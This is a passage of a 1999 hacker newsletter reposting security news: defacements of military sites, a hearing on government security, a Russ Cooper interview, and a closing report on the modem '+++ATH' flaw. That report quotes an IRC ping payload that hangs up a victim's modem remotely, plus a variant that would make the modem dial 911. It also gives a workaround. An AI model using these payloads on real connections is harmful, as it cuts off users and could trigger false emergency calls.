~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 23rd 1999 From HNN http://www.hackernews.com/ contributed by solvant Need a job? Live in Australia? X-Force, part of ISS, is recruiting Australian security experts for their three month old Australian office. We sure hope they do thorough background checks, wouldn't want them hiring any evil hackers by mistake. A quote from the article by Cris Rouland of ISS "I don't go out and recruit hackers per se; I look for very strong software engineers with a deep understanding of security and strong knowledge of the computer underground." If that isn't a hacker I don't know what is. Fairfax IT http://www.it.fairfax.com.au/software/19990621/A56795-1999Jun21.html Australians hack into the X-Force By DAVID BRAUE AN international anti-hacker organisation, X-Force, is recruiting Australian security experts for an Australian brigade. X-Force is operated by the security software company Internet Security Systems (ISS), which opened its Australian office three months ago. X-Force director Chris Rouland, in Brisbane last week to speak at a conference on computer security incident handling and response, said recruits for X-Force were "very difficult to find". "I don't go out and recruit hackers per se; I look for very strong software engineers with a deep understanding of security and strong knowledge of the computer underground." The Australian X-Force will join counterparts in London and Atlanta in keeping tabs on the underground community of hackers who attack government and corporate computer networks. Australian recruits will work while their overseas counterparts sleep, allowing a 24-hour security research organisation with global response capabilities. The 50-strong X-Force continually folds, spindles and mutilates commercial software to identify weaknesses that might be taken advantage of by hackers. Among its accomplishments was being the first to decipher the insidious Back Orifice trojan horse virus and produce a fix for the problem. "That was a good exercise for us, a chance to stretch our legs," laughs Rouland, about the application considered to be one of the most dangerous hacker attacks of the decade. Reports suggest the team's efforts are paying off: the analyst firm Yankee Group recently reported ISS as having 30 per cent of the $US315 million ($485 million) adaptive security market, while the No 2 firm, Axent Technologies, had 19 per cent. Many of the team's innovations - including proof-of-concept projects that are developed by a special team known as Protoworx - end up as additions to ISS's commercial suite of intrusion detection software. Recent X-Force work has produced the likes of the Attack Tracker (which allows intrusion detection systems to trace and identify incoming intruders); Casper (a Linux server that offers itself as a tempting target for hackers while collecting data on their break-in attempts); and the new Total Surveillance Architecture. @HWA 84.0 More Canadian RedBoxing from HackCanada ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 23rd 1999 From HNN http://www.hackernews.com/ contributed by RenderMan Need a RedBox in Canada? Got a Diamond Rio for your MP3s? One more reason for the authorities to hate MP3s and the device. HackCanada has released a text file on how to use your Diamond RIO as a RedBox. HackCanada http://www.hackcanada.com/canadian/phreaking/riobox.txt 85.0 SecureMac is Now Open ~~~~~~~~~~~~~~~~~~~~~~ June 23rd 1999 From HNN http://www.hackernews.com/ contributed by MacUser SecureMac.com has opened their doors this week to a new site devoted to Macintosh Security. Learn more about the security that exists for the mac, and how to make your system more secure. Learn just how weak or strong the security is on certain products as well. This site covers encryption, security, virus, and much more. This site is run by the same person who runs Freaks Macintosh Archives a site devoted to macintosh hacking and security. SecureMac.com http://www.securemac.com Freaks Macintosh Archive http://freaky.staticusers.net @HWA 86.0 Microsoft Demands Privacy ~~~~~~~~~~~~~~~~~~~~~~~~~ June 23rd 1999 From HNN http://www.hackernews.com/ contributed by Sangfroid Following in IBMs footsteps Microsoft will now demand a privacy statement be present on all web sites that it buys advertising from. Why have the two largest internet advertisers taken this stance? The FTC is about to make its recommendations to congress about whether tough new federal privacy laws should be enacted. Of course this means that HNN will have to post something about how you have no privacy and that we log everything, but then so does every other web site. It should be a fun page to write. Look for it in the next few days. Nando Times http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html Microsoft to require privacy statement before advertising on Web sites Copyright © 1999 Nando Media Copyright © 1999 Associated Press By TED BRIDIS WASHINGTON (June 22, 1999 11:21 p.m. EDT http://www.nandotimes.com) - Microsoft Corp., the largest advertiser on the Internet, has decided it will not buy ads next year on Web sites that fail to publish adequate privacy promises to consumers. The announcement comes less than three months after a similar decision by IBM, the Web's second-largest advertiser. The actions by the two companies come as the Federal Trade Commission prepares its recommendations to Congress on whether tough new federal privacy laws are needed to protect consumers online. The Microsoft announcement to be made Wednesday was expected at a computer conference in New York and will take effect after the end of the year. Microsoft said it spent about $30 million last year on Web ads - but that's still a small portion of the $2 billion spent last year on Web advertising, according to the Internet Advertising Bureau. Microsoft, which has lobbied with other industry groups against privacy laws legislation, earlier this year began offering a free digital tool kit that promises to allow consumers to use next-generation software to restrict what personal details Web sites collect about them. Consumers typically must manually find a company's online privacy statement, if one exists, and read through legalese to determine what personal information a Web site might be harvesting, such as their name, e-mail address or even favorite authors or clothing sizes. Last month, an industry-financed study showed businesses have made dramatic improvements since last year in warning people how companies use personal information collected about them. Nearly two-thirds of commercial Internet sites displayed at least some warning that businesses were collecting personal details from visitors, such as names, postal and e-mail addresses, and even shopping tastes, the study found. But less than 10 percent of those sites had what experts consider comprehensive privacy policies. A similar study last summer by the FTC found only 14 percent of sites warned how companies used private information they collected about customers. @HWA 87.0 Pentium III has 46 Bugs ~~~~~~~~~~~~~~~~~~~~~~~~~ June 23rd 1999 From HNN http://www.hackernews.com/ contributed by Kanuchsa The Pentium III bug list has been posted by Intel in PDF format, lists 46 bugs or "erratums" as Intel likes to call them, not much ahead for fixes for them hardware wise mainly because Intel is calling them minor. One of them is a FPU error which appears to have no plans to be fixed in the future. The UK Register http://www.theregister.co.uk/990617-000007.html PDF Doc listing 'erratums' not bugs ftp://download.Intel.nl/design/pentiumiii/specupdt/24445304.pdf 88.0 'War' Against FBI Continues ~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by dis-crete F0rpaxe has struck again and this time defaced the web site of the Naval Training Systems Center with some serious rhetoric leveled against the FBI. DigiAlmighty defaced the Naval Surface Warfare Center which is slightly ironic as the Dahlgren division of NSWC helped develop the Co-operative Intrusion Detection Evaluation and Response program commonly referred to as the 'hacker tracker'. Additionally the web site for NASA's Earth Observing System Data and Information System has been defaced by the Keebler Elves. HNN has mirrors of all three sites available. (Mirrors provided by attrition.) Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0621/web-navyhack-6-23-99.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html JUNE 23, 1999 . . . 7:52 EDT Hacker groups target Navy sites BY BOB BREWIN (antenna@fcw.com) AND DIANE FRANK (diane_frank@fcw.com) In the wake of attacks on the FBI World Wide Web sites earlier this month, hacker groups have now turned their attention to the Navy, including the Web site of a Navy organization that helped develop sophisticated hacker-tracker software. Last week a hacker defaced the Web site (www.nswc.navy.mil) of the Naval Surface Warfare Center's Dahlgren, Va. division with a mostly obscene message that read in part, "FEDS: You will never stop my FLOW. Nice try, though. Killing my hotmail account and all that. HAHHAHA." The Dahlgren division of NSWC helped develop the Co-operative Intrusion Detection Evaluation and Response program (www.nswc.navy.mil/ISSEC/CID/), which uses automated tools to track and analyze hacker attacks. Another hacker -- who, based on the postings on the defaced Navy Web sites, may be engaged in hacker duel with the Dahlgren attacker -- hit the Web site of the Naval Air Warfare Center Training Systems Division (www.ntsc.navy.mil), Orlando, Fla. This hacker, who affiliated himself with the group f0rpaxe, said on the defaced Navy page, "We own the Naval Air Warfare Center Systems Training Division. FBI spokesman said we were only doing some gov and mil servers [but] we rooted Naval Air Warfare Training Center....We had been exploring entire servers until today." Navy spokesmen have not returned calls from FCW asking for comment on the Web attacks. 89.0 Singapore Officials Arrest Two ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by Dioxin Two individuals have been arrested for violations of the Computer Misuse Act for their involvement in the recent web defacements of www.tcs.gov.sg and www.mediacity.com.sg (Television Corporation of Singapore). Apparently, they had forgotten to spoof their addresses before they committed the dirty act. They face a maximum of a S$10,000 fine and up to three years in jail. Speculation is that they used the new malformed .htr request bug in IIS to gain entry to the servers. The Straits Times http://straitstimes.asia1.com.sg/cyb/cyb1_0624.html (Link not found June 25th - Ed) 90.0 GSA Looking for IDS ~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by erewhon The General Services Administration is looking for vendors to set up and manage intrusion detection systems for civilian agency networks to monitor for cyber intrusions. The GSA plan calls for information gathered by the system to be sent to a central facility in Washington DC for analysis. Federal Computer Week http://fcw.com/pubs/fcw/1999/0621/web-gsa-6-23-99.html JUNE 23, 1999 . . . 11:10 EDT GSA seeks tools, services to monitor government nets BY DIANE FRANK (diane_frank@fcw.com) The General Services Administration is seeking vendors qualified to set up and manage hardware and software to monitor civilian agency networks for security breaches, the agency announced today. The project, being managed by the GSA Federal Technology Service's Office of Information Security, aims to build a full intrusion-detection system that will enable agencies to identify and collect information on external attacks on federal information technology resources, according to a notice published in Commerce Business Daily. The program initially will focus on identifying external attacks on agency systems. Under GSA's plan, information collected by the system will be transmitted almost immediately to a central analysis facility in the Washington, D.C., area. @HWA 91.0 Theres Money in them thar videos! (DEFCON WEBCAST) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ DefCon Live WebCast contributed by Shanners Unable to make it to Las Vegas this year? HNC Network, an HNN Affiliate, will be conducting a live webcast from the show floor. They will cover Hacker Jeopardy, Hacker Death Match, as well as numerous live interviews with speakers and attendees, and some recorded material. There will also be prizes given away through the webcast like Free/OpenBSD, RH 5.2 and Hackers Secrets 5. They are charging $29.95 for the three day broadcast. Live Defcon Webcast http://www.hack-net.com/defcon (I dunno, you make your own decisions on this one ... - Ed) 92.0 Kasparov Defaced? ~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by macwizard Well, something has been going on with the World vs. Kasparov Chess Match. Microsoft says it was technical difficulties due to server overload. We have a received a few emails saying that the site was indeed broken into. It is claimed that the password to the site was sniffed and that is how entry was gained. Unfortunately we are unable to confirm neither the MS position or the emails. BBC http://news2.thdo.bbc.co.uk/hi/english/sci/tech/newsid%5F376000/376147.stm Sci/Tech Kasparov's chess pieces disappear Kasparov will have 24 hours per move As the world's chess fans gathered on the Internet to pit their wits against champion Garry Kasparov, unorthodox rooks, knights, bishops and queens began appearing and disappearing on the board. Billed as the greatest Internet chess challenge ever, the chance to log on and compete against the world's greatest player attracted over two million hits in the first few hours. But the Microsoft Gaming Zone Web site hosting the tournament was not up to the challenge. As Bob Sullivan, technology reporter with MSNBC News watched, things began to go wrong, before a single move had been played. "Chess pieces were landing all over the board," Mr Sullivan reported. According to MSNBC, the problems were due to server overload - a technical hitch rather than a hacker spoiling the site on purpose. "It is certainly an embarrassment for the company," said Mr Sullivan. First move After Mr Kasparov's opening move (Pawn to E-4) in New York on Monday, he travelled to Washington, DC, where users guided by four young chess experts initiated the "Sicilian Defence", moving pawn to C-5. The World Team's first move was chosen by 41% of those voting. Kasparov declined to make another move in order to maintain the "suspense," said Audrey Waters, the chess champion's spokeswoman. He has 24 hours to respond. Deep Blue challenge Mr Kasparov is widely regarded as the greatest chess player ever. He has been particularly strong over the last few months with three convincing tournament victories in a row. In 1996 and 1997, he played two six-game matches against the Deep Blue computer, winning the first and losing the second. Millions of Net users are believed to have followed those games. It was the first time a computer had defeated a reigning world champion in a match played under classical chess rules. The chances of the world beating Mr Kasparov seem lower. @HWA 93.0 Russ Cooper Interview ~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by Space Rogue MSNBC has an excellent interview with Russ Cooper, the NTBugTraq administrator. If you subscribe to NTBugTraq, or even if you don't, you should read this. MSNBC http://www.msnbc.com/news/283054.asp Surgeon general of the Web? NTBugTraq’s Russ Cooper serves as independent authority on bugs, viruses, security issues By Bob Sullivan MSNBC June 23 — The eruption of a new computer virus often leads to massive confusion. Besieged system administrators and confused users need hard information about what the danger is and what to do, but it’s elusive. Adding to the confusion, anti-virus software companies issue superlative-laden press releases, perhaps exaggerating the real threat. Meanwhile, software vendors like Microsoft often downplay the threats to prevent bad PR. In the middle of this maelstrom is Russ Cooper. WHO’S RUSS COOPER? He’s the owner and administrator of perhaps the most popular security mailing list on the Internet, NTBugTraq — a sort of emergency broadcast system for computer network administrators. When any security hole is found, it’s posted to this list, sometimes even before Microsoft or anti-virus companies know about it. (Microsoft is a partner in MSNBC.) In fact, it’s a pelt of honor to be the first to send Cooper a bug, and posters do so sometimes to attract the attention of future employers. As the human filter for NTBugTraq’s 25,000 very devoted members, Cooper serves as a kind of referee for groups arguing about the authenticity and severity of computer crises, but he has his sights set on a loftier goal. He views himself as the surgeon general of the Internet. He grand plans include launching an Internet security “portal” Web site called Securityadvice.com in the fall. WITHOUT THE MARKETING SPIN “I just want to try and be a consistent voice to the masses for these types of issues,” Cooper said. “Trying to give the facts in a way people can understand that doesn’t overemphasize the threat. ... I don’t try and downplay things, but I’m not trying to get a stock increase out of [announcements]. I want people to be informed of the facts without the marketing spin.” His bare-bones, straightforward style came through on April 23, just before the Windows CIH/Chernobyl virus hit. While anti-virus companies and media outlets were warning of potential data devastation that never materialized in the United States, Cooper sent this note to his list: “The CIH virus might cause problems on Monday, April 26th, for some of you. Do a virus scan before 4/26/99. Check with your anti-virus vendor is you don’t know what it is, or see; http://www.antivirus.com/vinfo/alerts.htm for more info. ‘nuff said here.” Securityadvice will be a commercial site, and Cooper says his bankers have raised $2 million. But for now, he administers NTBugTraq and its companion Web site out of the goodness of his heart (the Web site does take in about $7,000 to $8,000 in advertising a month, enough to pay for a secretary and cover expenses). COOPER’S GIRLFRIEND Cooper’s heart shone through six weeks ago when the 39-year-old divorced man decided he was tired of living alone and took out a half-page personal ad in the local Lindsay, Ontario, newspaper, headlined, “Meg Ryan, where are you?” “I own my own business working on the Internet, became internationally recognized in my field, and moved to Lindsay to enjoy an idealistic lifestyle of working from home,” he wrote in the ad. Days later, a bus driver who read the ad set him up, and he has spent his weekends with Kathy ever since. But his weekdays, and weeknights, are devoted to the list. Cooper now spends 12 to 14 hours Monday through Friday in front of a computer screen. That includes the computer screen that hovers over his bed, hospital tray style. A COMPUTER IN HIS BOAT? “I can sit in bed and type and read away. I can do a quick check when I get up in the morning. ... I haven’t figured out how to get one in my boat yet,” Cooper joked. “In this role I have to be real responsive timewise.” Included in this labor of love are hours of free consulting Cooper offers to the 25,000 list members who send notes with possible “exploits.” He edits every note that comes in, removing redundant e-mails, posting only verifiable information. As often as not, a flaw sent to the list is caused by human error, not a computer bug, and Cooper offer free help desk-like advice to fix the problem. That keeps traffic on the list down to a trickle of about 10 messages or so per day — but all of them laser-focused. “People have told me in the past that they read every message I send and are prepared to react to every message I send,” Cooper said. THE IMPRESSIVE AUDIENCE Among those ready to react to every Cooper message: Jason Garms, the lead product manager for Windows NT security at Microsoft, who’s a list member. Even though Cooper’s list is devoted to publicly flogging (some might say embarrassing) Microsoft by revealing flaws in Windows NT, Garms says he has a good, personal working relationship with Cooper. They correspond by e-mail as often as once a week. “We don’t always see eye to eye with Russ,” said Garms, who has worked with Cooper since NTBugTraq went online in 1997 and isn’t crazy about times the list has posted exploits before Microsoft has had the time to fix the problem. After all, hackers monitor the list, too. “But we’ve had a good working relationship,” Garms said. “Russ provides an important service.... The reality is, an independent forum is always going to be useful.” Anti-virus vendors also sit poised to act on every Cooper-NTBugTraq note — even Network Associates, which Cooper has frequently criticized for exaggerating security threats. “It forces companies to keep on their toes,” said Dan Takata, spokesman for Data Fellows Inc., another security company. “He can’t always make everyone happy. He has gotten flamed by top anti-virus people, but I think he’s doing a valuable service.” PROVING GROUNDS Living in between software vendors and security firms might sound like precarious work, but Cooper’s eclectic background serves as solid preparation. He spent most of 1984-1990 running banking networks in Liberia, Africa. He didn’t return to Canada until he was forced out during the Liberian Revolution. He then took a job at the University of Toronto trying to make Novell’s Netware, Oracle software, an IBM mainframe and Windows 3.1 all work together. During this time, he honed the fine art of pestering software vendors by telephone, forcing them to support their products. “I follow instructions, and when it doesn’t work, I tell them I’m going to sue,” he said. “Asking questions is a skill. Asking questions of a vendor is an art.” AVOIDING RELIGIOUS WARS Later he went to work for Tandem Computers and subsequently held various networking jobs implementing Microsoft software. As the Internet explosion unfolded, he monitored mailing lists that continually slammed Windows NT security. But in many cases, posters were making religious statements such as “switch to Linux” more than they were engaging in a scientific debate over what NT could or couldn’t do. So in 1997, he filled that gap with NTBugTraq. And thus began Cooper’s odd role as a constant public flogger of NT’s flaws — and perhaps NT’s most public independent supporter. “I’m just trying to get rid of some of the religious arguments going on,” Cooper said. “There are people bashing NT because they didn’t know what it could do. I wanted to get intelligent security people to tell me the real issues with NT.” The list now acts as a filtering service both for Microsoft and for NT users. Instead of hundreds of e-mails from hundreds of administrators landing at Microsoft headquarters in Redmond, Wash., Cooper offers this promise: “You post to NT BugTraq, and I’ll follow up with Microsoft. ... They know if something’s coming from me, it has had a bit more work done on it.” SECURITYADVICE.COM The list doesn’t just cover Windows NT administration issues — it touches anything that might impact a computer professional running a Windows-based network. That made NTBugTraq a solid place for information on the most recent security/virus crises, such as Melissa and ExploreZip. But now he plans to expand that expertise, to all security issues facing all Internet users. “We’ll have two communities — one being the experts and the other being the Mom and Pop side,” Cooper said. He’ll then work to convince normal Internet users about the importance of security issues. Regular contributors will include Vin McClellan, an expert in cryptography, and Robert Abbott, sometimes known as the father of Internet security. Abbott was also the technical advisor for the cybercrime cult movie “Sneakers.” And of course, information will be available in e-mail format. Cooper and his Securityadvice.com concept have their detractors. He’s been criticized as a self-promoter, and his for-profit security site idea flies in the face of computer “purists” such as Linux coders who believe such information should be free; or that only a non-profit organization can really offer a “Good Housekeeping seal” for security information. “I’m not worried about commercializing my credibility,” Cooper said. ”[Someone] said I am doing all this for self-promotion. Maybe that’s true. But I’d like to think that what I’m promoting is helping people.” @HWA 94.0 Thanks-CGI Defaced With Its Own Script ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by Code Kid "The Coolest CGI Magician On The Net", has been defaced with one of its own tricks. Thanks-CGI has been a recent victim of poor security. If you have purchased scripts from this service in the past you may want to double check them to be sure you are not vulnerable as well. 7am News http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm Hacked Site Alleges Media Conspiracy Updated 7:35 am PDT, 24 June 1999 By Bruce Simpson Although repaired and back online within just a few short hours, the Thanks-CGI website appears to have been hit a second time by the "Hackers In Paradise" group. This time the group appear happy to have simply changed the scrolling javascript banner at the bottom of the page to read "HiP Welcomes you to THANKS-CGI.... We're trying to make your site more secure for the world!" The operator of the website has told 7am.com that they are currently testing for holes in their CGI scripts. They have suggested that the security hole may not be the fault of their scripts -- rather that it could have been a "misconfiguration between cgi script and the server." 7am.com discovered the hack while researching another story on CGI resources and contacted the site's operator by email immediately the problem was noticed. However, the operator of the Thanks-CGI site has suggested that because "the arrival of your e-mail was paced so closely with the occurence [sic] of the hackage ... we have strong reason to believe there might be a relationship between 7am.com and the hacker who hacked our site." 7am.com denies the allegations. Original Report To plagiarize and modify just a little: "As ye shall live by the Net, so shall ye die by the Net" -- at least that's the message "Hackers in Paradise" appear to be trying to impart on the operator of the Thanks-CGI site. Billing itself as "The Coolest CGI Magician On The Net", the Thanks-CGI site appears to have been left with a large amount of egg on its face after "Hackers in Paradise" seemingly exploited a security hole in one of the scripts and hacked the site's front page. "Yep another site selling cgi scripts with major security problems. CGI programmers need to spend a little time testing the security aspect of thier [sic] scripts before trying to make money with them" is the embarrassing message that greeted visitors to the hacked site. 7am.com has attempted to contact the operators of the Thanks-CGI site for comment but as yet they have not replied to our email. In the meantime, those who have purchased scripts from the site may well be advised to get a guarantee that the same hole which allowed hackers into the thanks-CGI site is not present in the software they purchased. @HWA 95.0 ToorCon Date Changes ~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by skalore The date of ToorCon has changed to September 3rd-4th, 1999. There will be no San Diego 2600 Meeting due to ToorCon falling on that date. The expo has also moved to the Price Center in The University of California, San Diego. HNN Cons Page http://www.hackernews.com/cons/cons.html 96.0 Gov Vulnerable Due to Lack of Training ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by Fedb0y The Technology Subcommittee of the House Committee on Science heard expert testimony on Thursday claiming that computer security training is desperately needed. The experts stressed that most federal employees do not take computer security seriously and that this is one reason for the numerous successful attacks on federal systems. Another reason that was given was the low salaries for properly trained security personnel. When good people are found or developed in house they are usually lured away by the private sector. San Jose Mercury News http://www.sjmercury.com/breaking/docs/055607.htm ABC News http://abcnews.go.com/sections/tech/DailyNews/hackers_govt990624.html USA Today http://www.usatoday.com/life/cyber/tech/ctf465.htm APB Online http://www.apbonline.com/911/1999/06/24/hack0624_01.html MSNBC http://www.msnbc.com/news/283837.asp US House Committee on Science http://www.house.gov/science/welcome.htm Congress May Ask for Regular Security Reports At the above hearing Rep. Connie Morella (R-Md.) mentioned that federal agencies should report the status of their computer security to Congress on a regular basis. She plans to include the requirement in her revisement of the Computer Security Act of 1987. All three witnesses at the hearing agreed this was a good idea. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0621/web-security-6-24-99.html Additional Government Sites Defaced While hearings where being held additional government sites where being defaced. This time it was Monmouth Army Base and the Argonne National Labs library. (mirrors provided by attrition) HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html San Jose Mercury News; Posted at 10:44 a.m. PDT Thursday, June 24, 1999 Government vulnerable to hackers, experts warn WASHINGTON (AP) -- Government web sites and computer networks are increasingly vulnerable to ``cyber attacks'' because they lack trained personnel and don't follow security plans, federal officials warned a congressional committee today. Few people have adequate training to defend government websites, and those who do seldom work in government for long, three panelists told the House Science Committee's subcommittee on technology. The security agencies ``train people at government expense and the private sector waves a bigger paycheck and takes them away,'' said Keith Rhodes, technical director with the General Accounting Ooffice. In addition, government security experts often find their advice isn't followed, said Raymond Kammer, director of the National Institutes for Standards and Technology, which recommends security measures for federal computers. ``It is imperative that federal agencies implement vigorous security programs,'' Rhodes said. Hacker attacks like the recent defacing of the Senate web site are well documented, but information about attempts to access sensitive intelligence information is ``very sketchy,'' said Michael Jacobs, a deputy director of the National Security Agency. Hackers are often nearly impossible to trace unless they boast of their actions. In the most common type of attack, hackers overwhelm web sites with a flood of requests for information, causing the site to slow or shut down. Hackers can also redirect visitors to a fake web site that appears to be the official site, as happened earlier this month to the Senate site. ``We are clearly seeing an escalation in both the destructive nature and aggressive pace of these and other attacks,'' Jacobs said. -=- ABC; Gov’t Server Hacker Warning Expert Panel Says Web Sites Are Vulnerable By David Ho The Associated Press W A S H I N G T O N, June 24 — Government web sites and computer networks are increasingly vulnerable to “cyber attacks” because they lack trained personnel and don’t follow security plans, federal officials warned a congressional committee today. Few people have adequate training to defend government websites, and those who do seldom work in government for long, three panelists told the House Science Committee’s subcommittee on technology. The security agencies “train people at government expense and the private sector waves a bigger paycheck and takes them away,” said Keith Rhodes, technical director with the General Accounting Ooffice. No One Follows Advice In addition, government security experts often find their advice isn’t followed, said Raymond Kammer, director of the National Institutes for Standards and Technology, which recommends security measures for federal computers. “It is imperative that federal agencies implement vigorous security programs,” Rhodes said. Hacker attacks like the recent defacing of the Senate web site are well documented, but information about attempts to access sensitive intelligence information is “very sketchy,” said Michael Jacobs, a deputy director of the National Security Agency. No Crowing, No Leads Hackers are often nearly impossible to trace unless they boast of their actions. In the most common type of attack, hackers overwhelm web sites with a flood of requests for information, causing the site to slow or shut down. Hackers can also redirect visitors to a fake web site that appears to be the official site, as happened earlier this month to the Senate site. “We are clearly seeing an escalation in both the destructive nature and aggressive pace of these and other attacks,” Jacobs said. -=- Federal Computer Weekly; House member suggests regular network security reports BY DIANE FRANK (diane_frank@fcw.com) Federal agencies may soon be required to submit regular reports to Congress on the security status of their networks, much as they now report their Year 2000 compliance. At a House Technology Subcommittee meeting today covering reasons why federal World Wide Web sites and systems are vulnerable to cyberattacks, Rep. Connie Morella (R-Md.) said that in her revision of the Computer Security Act of 1987 she plans to include a requirement for agencies to report to Congress regularly the steps they are taking to secure their sites and systems. All three witnesses at the hearing supported Morella's suggestion as a way to spur agencies to move beyond planning security measures and into implementing them. Testifying at the hearing were Keith Rhodes, director of the Office of Computer and Information Technology Assessment at the Accounting and Information Management Division of the General Accounting Office; Michael Jacobs, deputy director of information systems security at the National Security Agency; and National Institutes of Standards and Technology director Ray Kammer. "Security needs to stop being an afterthought," Rhodes said. "The value of reporting would be in a standardization of agencies' ability to report," he said. If agencies know the questions Congress will ask, they will better understand the fundamental IT implementation steps they must take, he said. Many agencies in the national security community already submit such reports and have found it helpful to undergo regular security assessments, Jacobs said. Rhodes, Jacobs and Kammer also suggested that the new computer security bill require federal agencies to use security expertise developed by NIST and NSA instead of "recommending" such steps, as the current act does. @HWA 97.0 Teeside University Offers Degree in Warez ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by Warez Dude The University of Teesside will soon offer a four year degree in warez. Courses will obviously include programing but also the history of warez, good game design and other topics to prepare graduates for entry into the booming computer game industry. BBC http://news.bbc.co.uk/hi/english/education/newsid_377000/377341.stm Teesside University http://www.tees.ac.uk/ BBC; Education Compulsory games for students The courses will prepare students for a career in the games industry A university computer department is taking down notices saying that it is forbidden to play games - and replacing them with new signs saying that it is going to become compulsory. The University of Teesside is introducing a degree course in designing computer games, which will mean four years of playing and building games and writing essays on such subjects as the history of computer games. For serious addicts of screen games, there is a course unit dedicated to the appreciation of games, which will involve comparing the relative merits of the latest releases and classics such as Sonic the Hedgehog and Super Mario. Expanding market The course tutor, Matthew Holton, says that the new qualification, which will have links with games companies, will provide graduates for the expanding jobs market in the computer games industry. "The course has been compiled with a great deal of input from experts in the games industry so graduates from these degrees may have no problem walking into jobs," he said. "People don't realise how large the computer games industry has become - or that some of the best games are developed in Britain." The course has been designed as practical training for a career in designing computer games, with students spending their time learning about how to make games and considering which approaches produce the best results. Serious endeavour Mr Holton, who expects the course to attract serious games enthusiasts, says that assessing students' efforts will not be problematic. "There are plenty of academic criteria that can be applied to such a course, such as assessing the quality of art work, lighting, animation, interaction and the user interface." The university is offering two degree courses for computer games - one in the creative design for games and the other in computer programming. But even though the courses are dealing with games, a university spokesman emphasised that these were not "Mickey Mouse" subjects, but were serious vocational courses serving a growing sector of the economy. @HWA 98.0 FREE DefCon WebCasts ~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by angus Yesterday HNN mentioned that HNC Network would be providing a webcast of DefCon for $29.95. These sites will also be broadcasting live audio and video streams of selected speakers, interviews and video live from the show floor. These feeds are FREE to the public. Pirate Radio UK http://www.pirate-radio.co.uk Hacksec http://www.hacksec.org 99.0 Old Modem Flaw Still Haunts Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by pbradely Hayes, the old modem manufacturer, may not live any longer but its legacy lives on. Hayes originally had the patent on the escape sequence "+ + + ATH" (without the spaces) It would appear that many modems manufacturers are still not paying the royalties for TIES (Time Independent Escape Sequence). As discovered years ago this escape sequence will force many modems to go offline or into command mode forcing a reboot. An excellent DoS attack. MacInTouch has an interesting new report on this OS independent problem. If you find that you are susceptible to this ancient flaw you can try changing the value of the S2 register to something greater than 127. (Consult your modem manual on how to do this.) Macintouch Report http://www.macintouch.com/modemsecurity.html BugTraq Archive Sept 1998 http://geek-girl.com/bugtraq/1998_3/0916.html Macintouch; Modem Guard Mode/Security Defect 1.Problem Description 2.Workarounds 3.Background Info Important note: The incredible modem defect described below makes it impossible for many people to even view certain character sequences without triggering the bug. As a result we have been forced to change the modem command strings in all the examples below, inserting spaces between the plus signs. The actual command strings have no spaces or quotes. Problem Description Date: Sun, 20 Jun 1999 15:01:47 -0400 From: "Mohammad A. Haque" Subject: Global Village modem exploit? Apparently there seems to be a problem with Global Village modems where you can cause it to execute modem commands remotely. If you send a computer an AT command in a packet that another remote machine responds to (i.e. ctcp, ping, icmp) the modem on that machine doe sthat command. For example, while on irc if I sent the commad /ctcp SomeOne ping + + +ATH0, SomeOne's machine would respond to the ping and as a result his/her modem would hang up right after that. It just doesn't stop there. Imagine sending out /ctcp SomeOne ping + + + + ATH0ATADT911. Is this a known problem with Global Village modems? Mohammad A. Haque Subject: new denial of service attack? Date: Mon, 21 Jun 1999 From: [MacInTouch reader] Hi there! I was playing around this weekend and found what appears to be a denial of service attack which works with dreadful effectiveness on iMacs and pretty much any other Mac with certain Global Village modems. It was essentially pointed out to me by a couple of kid phreakers, and at first I dismissed it until I watched them repeatedly knock a couple of iMac and other GV users off the net. Hopefully, you guys know all about this stuff, and there was a bug fix released that neither I nor my guinea pig tester could find. But just in case you don't... Modem? Yes, this attack seems to exploit a firmware issue. Apparently, the Global Village modem in the iMac as well as a few other external modems are susceptible. I don't have the resources to test different modems, but I suspect that the problem is going to be found in every GV with the same chipset. Symptom: Immediate hangup/disconnection upon receiving the signal. Technical description of the setup: Modems have two modes- command mode, where they will process commands issued to them, and connect mode, where they simply pass data. When you dial another modem and a connection is made, the modem switches to connect mode by default. When you wish to hang up, a signal is sent which forces the modem into command mode so that it can interpret commands, and then processes the hangup command as issued from the computer. The process for switching a modem from connect mode to command mode is simple- there must be silence on the connection for a specified amount of time, followed by the + (plus) symbol repeated 3 times (+ + +) followed by an equal silent pause. The pause is known as "Guard Time," to ensure that your modem doesn't accidentally hang up whenever it encounters the string "+ + +" in regular communications. Additionally, most modems can only accept the command mode string when it comes from the DTE (serial side) of the connection rather than the remote side. Although I've yet to confirm it, it would appear that the affected modems have their guard time duration value set to zero- meaning that the string should throw their modems into command mode without any silence on the line before or after the switch string. The exploit: In simplest terms, if I can send something to a computer connected by one of these modems which will be repeated back byte for byte, there's a fair chance that the command mode string (+ + +) will not be broken up by the characters encapsulating it within a packet (if on a PPP connection) I don't fully understand PPP encapsulation, I would think that that alone would be enough to protect against this sort of attack... but I've seen that it isn't. Add it 